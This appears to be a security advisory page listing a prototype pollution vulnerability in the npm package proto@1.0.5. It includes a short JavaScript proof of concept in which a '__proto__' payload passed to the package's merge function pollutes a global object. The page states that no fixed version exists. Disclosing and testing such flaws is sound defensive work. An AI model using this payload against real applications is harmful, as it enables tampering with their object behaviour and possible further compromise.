proto@1.0.5 vulnerabilities

A prototype-based inheritance library that makes it easy to create objects and inheritance hierarchies without losing the power of javascript's prototype system.

Direct Vulnerabilities

Known vulnerabilities in the proto package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • M
Prototype Pollution

Proto is an An extensible program-code-template for creating objects

Affected versions of this package are vulnerable to Prototype Pollution. It is possible to inject pollute the object property of an application using Proto by leveraging the merge function.

PoC

var proto = require('Proto');
var payload = '{"__proto__":{"polluted":"Pollution"}}';
var test = {};
console.log("Before: ", test.polluted);
proto.merge({},JSON.parse(payload));
console.log("After: ", test.polluted);

How to fix Prototype Pollution?

There is no fixed version for Proto.

*